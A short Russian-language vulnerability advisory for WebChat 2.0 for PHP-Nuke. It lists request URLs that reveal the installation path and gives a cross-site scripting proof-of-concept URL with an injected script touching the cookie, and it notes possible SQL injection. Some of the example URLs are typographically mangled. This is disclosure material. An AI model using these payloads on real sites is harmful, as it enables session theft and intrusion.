Несколько уязвимостей обнаружено в WebChat 2.0 для PHP-Nuke. Удаленный пользователь может определить инсталляционный путь. Удаленный пользователь может выполнить XSS нападение. 

Запрос следующих сценариев раскроет инсталляционный путь удаленному пользователю, пример: 

http://[target]/modules/WebChat/out.php
http:/ /[target]/modules.php?op=modload&name=WebChat&file=index &roomid=Non_Numeric
http://[target]/modules/WebChat/in.php
http://[target]/modules/WebChat/quit.php
http://[tar get]/modules/WebChat/users.php

Удаленный пользователь может сконструировать специально обработанный URL, который, когда будет загружен в браузере целевого пользователя, выполнит произвольный код сценария в контексте WebChat сайта. Пример: 

http://[target]/modules/WebChat/users.php?rid =Non_Numeric& uid=-1&username=[Any_Word_or_your_code]
http://[target]/modules/WebChat/users.php?rid=Non_Numeric&uid=-1 &username="><script>alert(documentcookie);</scrip t>

Согласно сообщению, эта уязвимость может также использоваться для внедрения произвольных SQL команд, которые будут выполнены на основной базе данных. 

Уязвимость обнаружена в WebChat for PHP-Nuke 2.0.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии